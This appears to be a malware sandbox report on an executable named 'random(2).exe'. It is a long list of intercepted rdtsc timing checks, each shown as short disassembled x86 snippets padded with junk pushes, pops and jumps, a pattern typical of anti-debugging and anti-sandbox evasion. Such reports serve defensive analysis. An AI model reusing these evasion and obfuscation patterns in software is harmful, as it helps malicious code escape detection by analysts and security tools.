                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C73 second address: 849C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C7D second address: 849C8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007F83146B40C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C8E second address: 849CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8314EA9186h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F8314EA918Dh 0x00000015 popad 0x00000016 popad 0x00000017 push edi 0x00000018 pushad 0x00000019 jns 00007F8314EA9186h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849F63 second address: 849F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F83146B40C6h 0x0000000a jmp 00007F83146B40D2h 0x0000000f popad 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A109 second address: 84A15C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8314EA9186h 0x00000008 jmp 00007F8314EA9195h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F8314EA919Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8314EA9197h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A2C9 second address: 84A2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83146B40D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A2E6 second address: 84A323 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F8314EA9186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F8314EA9199h 0x00000012 jmp 00007F8314EA918Eh 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A4B3 second address: 84A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A4C3 second address: 84A4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F8314EA9186h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854A9D second address: 854AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854AA1 second address: 854AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854E8E second address: 854EC0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F83146B40C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F83146B40D2h 0x00000012 pushad 0x00000013 jmp 00007F83146B40D1h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EC0 second address: 854EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9198h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EE3 second address: 854EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EE7 second address: 854EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8551BE second address: 8551C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85541A second address: 85543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9193h 0x00000009 popad 0x0000000a js 00007F8314EA918Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85543A second address: 85543E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85543E second address: 855443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 855E7D second address: 855E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85660D second address: 856619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F8314EA9186h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 856619 second address: 856624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 856624 second address: 856647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8314EA9199h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 856647 second address: 85666C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F83146B40D0h 0x00000010 jl 00007F83146B40C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85F415 second address: 85F41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85F41C second address: 85F422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86C0CE second address: 86C0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86C0D2 second address: 86C0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86C0E7 second address: 86C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9192h 0x00000007 je 00007F8314EA918Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8314EA918Fh 0x0000001c jmp 00007F8314EA918Fh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86C129 second address: 86C157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F83146B40D1h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86BCD7 second address: 86BD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9191h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jng 00007F8314EA9186h 0x00000011 jmp 00007F8314EA918Eh 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F8314EA9186h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86BD0B second address: 86BD25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 86BE56 second address: 86BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8710C1 second address: 8710C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8710C5 second address: 8710C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8710C9 second address: 8710DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F83146B40C6h 0x0000000e je 00007F83146B40C6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 870A96 second address: 870A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 870A9A second address: 870AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 870AA0 second address: 870AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8763E0 second address: 8763E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 87E222 second address: 87E22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8314EA9186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 87E086 second address: 87E0C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F83146B40DEh 0x00000008 jmp 00007F83146B40D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F83146B40D8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 87E0C3 second address: 87E0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 881551 second address: 881557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 881557 second address: 881570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8314EA9188h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 881570 second address: 881574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8838E4 second address: 8838EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8838EA second address: 88391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F83146B40CEh 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007F83146B40C6h 0x00000014 jne 00007F83146B40C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F83146B40CCh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8879E7 second address: 8879EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8879EC second address: 8879F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887B39 second address: 887B45 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8314EA9186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887B45 second address: 887B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887B5C second address: 887B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887EC4 second address: 887ED7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F83146B40C6h 0x00000008 jnl 00007F83146B40C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887ED7 second address: 887EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887EDC second address: 887EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 887EE2 second address: 887EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 88805F second address: 888065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 888065 second address: 888070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 888070 second address: 888075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 888075 second address: 88807A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 88C6FB second address: 88C701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 88C701 second address: 88C709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 88C709 second address: 88C718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 88C718 second address: 88C71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8975B0 second address: 8975CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jl 00007F83146B40C6h 0x0000000c jp 00007F83146B40C6h 0x00000012 pop edx 0x00000013 jo 00007F83146B40D8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8975CF second address: 8975D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8A5291 second address: 8A52B3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 jmp 00007F83146B40D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8A512E second address: 8A5148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9191h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8A5148 second address: 8A515D instructions: 0x00000000 rdtsc 0x00000002 je 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnl 00007F83146B40C6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AACE1 second address: 8AAD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9199h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA81A second address: 8AA833 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F83146B40CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F83146B40C8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA833 second address: 8AA83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA83B second address: 8AA83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA83F second address: 8AA895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9198h 0x00000007 jmp 00007F8314EA9199h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8314EA9198h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA895 second address: 8AA89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA89A second address: 8AA8A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AA8A1 second address: 8AA8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AE4B6 second address: 8AE4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8AE4BE second address: 8AE4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C19A3 second address: 8C19A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C1B4C second address: 8C1B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D3h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C1B66 second address: 8C1B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9192h 0x00000007 jne 00007F8314EA9186h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C1FD7 second address: 8C2006 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F83146B40CAh 0x00000008 jmp 00007F83146B40CAh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F83146B40D2h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C2323 second address: 8C236F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8314EA9198h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F8314EA9190h 0x00000016 jl 00007F8314EA9186h 0x0000001c ja 00007F8314EA9186h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 jne 00007F8314EA9186h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C24FD second address: 8C2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C2622 second address: 8C262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C262B second address: 8C2668 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F83146B40D7h 0x00000011 jnp 00007F83146B40CCh 0x00000017 jne 00007F83146B40C6h 0x0000001d push edx 0x0000001e jmp 00007F83146B40CBh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C6BC9 second address: 8C6BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C6DE7 second address: 8C6DF4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C6DF4 second address: 8C6E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov edx, 62EE8640h 0x0000000c cmc 0x0000000d push 00000004h 0x0000000f jmp 00007F8314EA9192h 0x00000014 call 00007F8314EA918Fh 0x00000019 add dword ptr [ebp+122D2397h], edx 0x0000001f pop edx 0x00000020 call 00007F8314EA9189h 0x00000025 push eax 0x00000026 push edx 0x00000027 jg 00007F8314EA9197h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C6E4D second address: 8C6EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83146B40D1h 0x00000008 jo 00007F83146B40C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F83146B40D7h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jl 00007F83146B40C8h 0x00000022 push edi 0x00000023 pop edi 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F83146B40CAh 0x00000035 jne 00007F83146B40C6h 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C6EAC second address: 8C6EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8314EA9199h 0x00000015 rdtsc
